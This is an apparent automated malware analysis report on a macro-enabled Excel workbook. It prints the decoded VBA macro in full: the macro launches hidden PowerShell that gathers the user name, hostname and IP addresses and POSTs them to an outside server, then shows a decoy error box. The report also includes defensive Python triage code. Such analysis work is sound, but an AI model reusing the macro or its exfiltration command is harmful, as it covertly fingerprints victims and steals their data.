Verdict: MALICIOUS
Risk score: 418
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell
T1204.002 User Execution: Malicious File
T1564.003 Hide Artifacts: Hidden Window (powershell -windowstyle hidden via WScript.Shell.Exec)
T1033 System Owner/User Discovery (whoami)
T1082 System Information Discovery (hostname)
T1016 System Network Configuration Discovery (Test-Connection for the local IPv4, ipinfo.io for the public IP)
T1041 Exfiltration Over C2 Channel (HTTP POST of the collected values to http://181.143.182.204/form.php)
The sample is a macro-enabled Excel workbook (OOXML with an embedded xl/vbaProject.bin) whose Workbook_Open handler runs PowerShell through WScript.Shell.Exec with -windowstyle hidden. The recovered macro source does not download or run a second stage. The PowerShell command collects the user name (whoami), the hostname, the local IPv4 address (Test-Connection against the hostname) and the public IP (Invoke-RestMethod to http://ipinfo.io/json), places the values in a hashtable under form-field names (name, cedula, celular, email) and POSTs it with Invoke-WebRequest to http://181.143.182.204/form.php. The macro then reads the process's stdout with ReadAll, which blocks Excel until the request finishes, and launches a second hidden PowerShell that only shows a decoy message box ("Error x00000001312377", titled "System Message") so the stall looks like a benign error. Sheet visibility is used as an enable-content lure rather than to hide the macro: on open, every worksheet is made visible and the sheet "Inicio" (the only one visible before macros run) is set to xlVeryHidden; Workbook_BeforeClose reverses this (only "Inicio" visible, all other sheets xlVeryHidden) and saves, so the file is re-armed for the next recipient. The server response is stored in strPSResults and never used, so the only network behaviour the code supports is host fingerprinting and exfiltration over plain HTTP.
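The summary above was checked against the extracted source rather than against the heuristic hits, because the PowerShell command is assembled by string concatenation and one of the rule matches lands on a commented-out line. The following Python is an added example written for this report (not the analyzer's own code): it resolves simple VBA `"literal" & variable` assignments, then classifies every resolved string that launches powershell. MACRO_SOURCE is the live part of Workbook_Open from the macros.bas preview below; the regular expressions, the dataclass fields and the verdict labels are this example's own choices and are not part of any tool on the page.

```python
"""Resolve VBA string building and classify the PowerShell it launches.

Added example for this report, not the analyzer's own code. MACRO_SOURCE is
the live part of ThisWorkbook.Workbook_Open from the extracted macros.bas;
the regexes, field names and verdict labels are this example's own.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Copied from the extracted macro shown in this report (the rest of the module
# is VBA attribute boilerplate and sheet-visibility code).
MACRO_SOURCE = r'''
' Construct PowerShell Command (PS syntax)
' strPSCommand = "get-acl C:\temp | foreach-object{ $_.Access } |select -property IdentityReference, AccessControlType, FileSystemRights"
strPSCommand = "$postParams = @{name = whoami ;cedula = hostname; celular = $ipV4 = Test-Connection -ComputerName (hostname) -Count 1 | Select IPV4Address; email = Invoke-RestMethod http://ipinfo.io/json | Select -exp ip}; Invoke-WebRequest -Uri http://181.143.182.204/form.php -Method POST -Body $postParams"
' Consruct DOS command to pass PowerShell command (DOS syntax)
strDOSCommand = "powershell -windowstyle hidden -command " & strPSCommand & ""
Set objShell = CreateObject("Wscript.Shell")
Set objExec = objShell.Exec(strDOSCommand)
strPSResults = objExec.StdOut.ReadAll
strPSCommand1 = "$wshell = New-Object -ComObject Wscript.Shell; $wshell.Popup('Error x00000001312377',0,'System Message',64+1)"
strDOSCommand1 = "powershell -windowstyle hidden -command " & strPSCommand1 & ""
Set objExec11 = objShell.Exec(strDOSCommand1)
'''

VBA_STRING = re.compile(r'"((?:[^"]|"")*)"')          # VBA doubles quotes to escape them
ASSIGN = re.compile(r'^([A-Za-z_]\w*)\s*=\s*(.+)$')   # plain `name = expr` (not Set/If/Dim)
PS_LAUNCH = re.compile(r'\bpowershell(?:\.exe)?\b', re.I)
HIDDEN = re.compile(r'-w(?:indowstyle)?\s+h(?:idden)?\b', re.I)
URL = re.compile(r'https?://[^\s"\'<>()\[\]{}|;,]+', re.I)
HTTP_METHOD = re.compile(r'-Method\s+(\w+)', re.I)
FETCH = re.compile(r'Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient|'
                   r'Download(?:String|File|Data)|Start-BitsTransfer', re.I)
EXECUTE = re.compile(r'\biex\b|Invoke-Expression|Start-Process|\bsaps\b|FromBase64String|'
                     r'\bmshta\b|rundll32|regsvr32', re.I)
RECON = re.compile(r'\bwhoami\b|\bhostname\b|Test-Connection|ipinfo\.io|Get-CimInstance|'
                   r'Get-WmiObject|\$env:(?:USERNAME|COMPUTERNAME)', re.I)
MESSAGE_BOX = re.compile(r'\.Popup\(|\[System\.Windows\.Forms\.MessageBox\]|MsgBox', re.I)


def live_lines(vba: str):
    """Yield VBA lines with comments removed: a ' outside a string literal starts one."""
    for raw in vba.splitlines():
        out, in_str = [], False
        for ch in raw:
            if ch == '"':
                in_str = not in_str          # a doubled "" flips twice, net no change
            elif ch == "'" and not in_str:
                break
            out.append(ch)
        line = ''.join(out).strip()
        if line and not line.lower().startswith('rem '):
            yield line


def split_concat(expr: str) -> List[str]:
    """Split an expression on & operators that sit outside string literals."""
    parts, buf, in_str = [], [], False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch == '&' and not in_str:
            parts.append(''.join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append(''.join(buf).strip())
    return parts


def resolve_strings(vba: str) -> Dict[str, str]:
    """Evaluate `var = "lit" & other_var & "lit"` assignments in source order.
    Unknown pieces stay as <name> tokens so partial results remain readable."""
    symbols: Dict[str, str] = {}
    for line in live_lines(vba):
        m = ASSIGN.match(line)
        if not m:
            continue
        name, expr = m.group(1), m.group(2)
        pieces = []
        for part in split_concat(expr):
            lit = VBA_STRING.fullmatch(part)
            if lit:
                pieces.append(lit.group(1).replace('""', '"'))
            else:
                pieces.append(symbols.get(part, f'<{part}>'))
        symbols[name] = ''.join(pieces)
    return symbols


@dataclass
class PowerShellLaunch:
    variable: str                 # VBA variable holding the resolved command line
    command_line: str
    hidden_window: bool
    urls: List[str]
    http_method: Optional[str]
    recon: List[str]              # host-fingerprinting commands seen in the payload
    decoy_message_box: bool
    verdict: str


def classify(cmd: str) -> str:
    """Coarse verdict for one PowerShell command line (labels are this example's)."""
    method = HTTP_METHOD.search(cmd)
    if FETCH.search(cmd) and EXECUTE.search(cmd):
        return 'download-and-execute'       # fetched content is run
    if method and method.group(1).upper() in ('POST', 'PUT') and re.search(r'-Body\b', cmd, re.I):
        return 'exfiltration'               # data pushed out, nothing fetched is run
    if FETCH.search(cmd) or URL.search(cmd):
        return 'network-activity'
    return 'local-only'


def triage(vba_source: str) -> List[PowerShellLaunch]:
    """Find every resolved string that is a powershell command line and classify it."""
    launches = []
    for name, value in resolve_strings(vba_source).items():
        if not PS_LAUNCH.search(value):
            continue
        method = HTTP_METHOD.search(value)
        launches.append(PowerShellLaunch(
            variable=name, command_line=value,
            hidden_window=bool(HIDDEN.search(value)),
            urls=URL.findall(value),
            http_method=method.group(1).upper() if method else None,
            recon=sorted({m.lower() for m in RECON.findall(value)}),
            decoy_message_box=bool(MESSAGE_BOX.search(value)),
            verdict=classify(value)))
    return launches


if __name__ == '__main__':
    for launch in triage(MACRO_SOURCE):
        print(f'{launch.variable}: {launch.verdict}, hidden={launch.hidden_window}, '
              f'method={launch.http_method}, urls={launch.urls}, recon={launch.recon}')
```

Run against the extracted source, the first launch (strDOSCommand) resolves to a hidden-window POST with -Body carrying whoami, hostname, Test-Connection and ipinfo.io output to form.php, and the second (strDOSCommand1) to a hidden-window message box with no network activity; neither contains a download-and-execute chain. Swap MACRO_SOURCE for the output of `olevba --decode` on another file to reuse the same check.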
Heuristics (10)
- ClamAV: Xls.Dropper.Agent-7755758-0 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Xls.Dropper.Agent-7755758-0
- VBA project inside OOXML [medium, 6 related findings] OOXML_VBA
  Document contains a VBA project (VBA macros present).
- Shell() call in VBA [critical] OLE_VBA_SHELL
  Matched line in script:
    ' Create shell object
    Set objShell = CreateObject("Wscript.Shell")
- WScript.Shell usage [critical] OLE_VBA_WSCRIPT
  Matched line in script:
    ' Create shell object
    Set objShell = CreateObject("Wscript.Shell")
- PowerShell reference in VBA [critical] OLE_VBA_PS
  Matched line in script:
    Dim objExec1
    ' Construct PowerShell Command (PS syntax)
    ' strPSCommand = "get-acl C:\temp | foreach-object{ $_.Access } |select -property IdentityReference, AccessControlType, FileSystemRights"
  Note: the matched line is a commented-out leftover (a get-acl one-liner) and never runs. The live PowerShell is the string assigned to strPSCommand on the following line and launched through strDOSCommand ("powershell -windowstyle hidden -command " & strPSCommand); read that assignment, not the comment, when deciding what the sample does.
- CreateObject call [high] OLE_VBA_CREATEOBJ
  Matched line in script:
    ' Create shell object
    Set objShell = CreateObject("Wscript.Shell")
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro [low] OLE_VBA_WBOPEN
  Matched line in script:
    Private Sub Workbook_Open()
- Hidden worksheet (veryHidden) [low] OOXML_HIDDEN_SHEET
  Excel workbook contains 10 hidden sheet(s). Hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction. In this sample the macro toggles visibility itself: Workbook_Open unhides every sheet and sets "Inicio" to xlVeryHidden, and Workbook_BeforeClose hides every sheet except "Inicio" again and saves, so the stored file always presents the single "Inicio" sheet until macros run.
- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    http://181.143.182.204/form.php (in document text: OOXML body / shared strings)
    http://ipinfo.io/json (in document text: OOXML body / shared strings)
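The hidden-sheet finding can be reproduced offline by reading the state attribute of each sheet element in xl/workbook.xml, which is what the OOXML_HIDDEN_SHEET heuristic is reporting on. The Python below is an added example for this report, not the analyzer's code. build_sample_workbook() is a constructed stand-in with the layout the report describes (one visible sheet named Inicio, ten veryHidden sheets, and an empty placeholder at xl/vbaProject.bin instead of a real VBA project); it is not the analysed file. Pass the real .xlsm bytes to sheet_states() or hidden_sheet_report() to run the same check on it. The one-visible-sheet-plus-VBA pattern flagged by hidden_sheet_report() is this example's own rule of thumb.

```python
"""Enumerate worksheet visibility from xl/workbook.xml without opening Excel.

Added example for this report, not the analyzer's code. build_sample_workbook()
is a constructed stand-in with the sheet layout the report describes; the
analysed sample itself is not reproduced here.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

SSML = 'http://schemas.openxmlformats.org/spreadsheetml/2006/main'
RELS = 'http://schemas.openxmlformats.org/officeDocument/2006/relationships'
NS = {'s': SSML}


def sheet_states(xlsx_bytes: bytes) -> List[Tuple[str, str]]:
    """Return (name, state) for each <sheet> in workbook order.

    state is 'visible' when the attribute is absent, otherwise 'hidden' or
    'veryHidden'. A veryHidden sheet cannot be unhidden from the Excel UI,
    only from VBA or the VBE properties window, which is why macros use it.
    """
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        root = ET.fromstring(z.read('xl/workbook.xml'))
    return [(sheet.get('name'), sheet.get('state', 'visible'))
            for sheet in root.findall('./s:sheets/s:sheet', NS)]


def hidden_sheet_report(xlsx_bytes: bytes) -> Dict[str, object]:
    """Summarise visibility and flag the enable-content lure layout.

    The rule (this example's own): exactly one visible sheet, at least one
    veryHidden sheet, and a VBA project present. The macro then flips
    visibility at runtime, exactly as the Workbook_Open/BeforeClose pair in
    this report does.
    """
    states = sheet_states(xlsx_bytes)
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        has_vba = 'xl/vbaProject.bin' in z.namelist()
    by_state = {st: [name for name, s in states if s == st]
                for st in ('visible', 'hidden', 'veryHidden')}
    lure = len(by_state['visible']) == 1 and len(by_state['veryHidden']) >= 1 and has_vba
    return {
        'sheets': states,
        'visible': by_state['visible'],
        'hidden': by_state['hidden'],
        'very_hidden': by_state['veryHidden'],
        'has_vba_project': has_vba,
        'macro_lure_pattern': lure,
    }


def build_sample_workbook() -> bytes:
    """Constructed stand-in, not the real sample: one visible sheet 'Inicio',
    ten veryHidden sheets 'Hoja1'..'Hoja10', and an empty placeholder where
    xl/vbaProject.bin would live. Enough for the visibility check only."""
    hidden = ''.join(
        f'<sheet name="Hoja{i}" sheetId="{i + 1}" state="veryHidden" r:id="rId{i + 1}"/>'
        for i in range(1, 11))
    workbook_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<workbook xmlns="{SSML}" xmlns:r="{RELS}">'
        '<sheets><sheet name="Inicio" sheetId="1" r:id="rId1"/>' + hidden + '</sheets>'
        '</workbook>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr('xl/workbook.xml', workbook_xml)
        z.writestr('xl/vbaProject.bin', b'')   # placeholder, not a real VBA project
    return buf.getvalue()


if __name__ == '__main__':
    report = hidden_sheet_report(build_sample_workbook())
    print(f"visible={report['visible']} veryHidden={len(report['very_hidden'])} "
          f"vba={report['has_vba_project']} lure_pattern={report['macro_lure_pattern']}")
```

On a real file, compare the stored states with what the macro does at runtime: if the saved workbook has one visible sheet and the Workbook_Open handler unhides everything, the hidden sheets hold the content the victim is lured into enabling macros to see, rather than the payload itself.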
Extracted artifacts (2)
Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 5400 bytes
SHA-256: 3e44f007cf297a3f1a0e8db4000811d8c06cf910590df18af499382273898549

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
Sheets("Inicio").Visible = xlSheetVisible
For Each ws In ThisWorkbook.Worksheets
If ws.Name <> "Inicio" Then
ws.Visible = xlVeryHidden
End If
Next ws
ActiveWorkbook.Save
End Sub
Private Sub Workbook_Open()
For Each ws In ThisWorkbook.Worksheets
ws.Visible = xlSheetVisible
Next ws
Sheets("Inicio").Visible = xlVeryHidden
Dim strPSCommand0
Dim strDOSCommand0
Dim strPSCommand1
Dim strDOSCommand1
Dim objShell
Dim objShell1
Dim objExec
Dim objExec1
' Construct PowerShell Command (PS syntax)
' strPSCommand = "get-acl C:\temp | foreach-object{ $_.Access } |select -property IdentityReference, AccessControlType, FileSystemRights"
strPSCommand = "$postParams = @{name = whoami ;cedula = hostname; celular = $ipV4 = Test-Connection -ComputerName (hostname) -Count 1 | Select IPV4Address; email = Invoke-RestMethod http://ipinfo.io/json | Select -exp ip}; Invoke-WebRequest -Uri http://181.143.182.204/form.php -Method POST -Body $postParams"
' Consruct DOS command to pass PowerShell command (DOS syntax)
strDOSCommand = "powershell -windowstyle hidden -command " & strPSCommand & ""
' Create shell object
Set objShell = CreateObject("Wscript.Shell")
' Execute the combined command
Set objExec = objShell.Exec(strDOSCommand)
' Read output into VBS variable
strPSResults = objExec.StdOut.ReadAll
strPSCommand1 = "$wshell = New-Object -ComObject Wscript.Shell; $wshell.Popup('Error x00000001312377',0,'System Message',64+1)"
strDOSCommand1 = "powershell -windowstyle hidden -command " & strPSCommand1 & ""
Set objShell1 = CreateObject("Wscript.Shell")
Set objExec11 = objShell.Exec(strDOSCommand1)
End Sub
Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja9"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja10"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 50688 bytes
SHA-256: 3c9cf9953503a19741a1c9abec749818a232637a7c34bae87f747e18d7367e57
Detection
ClamAV: Xls.Dropper.Agent-7755758-0
Obfuscation or payload: unlikely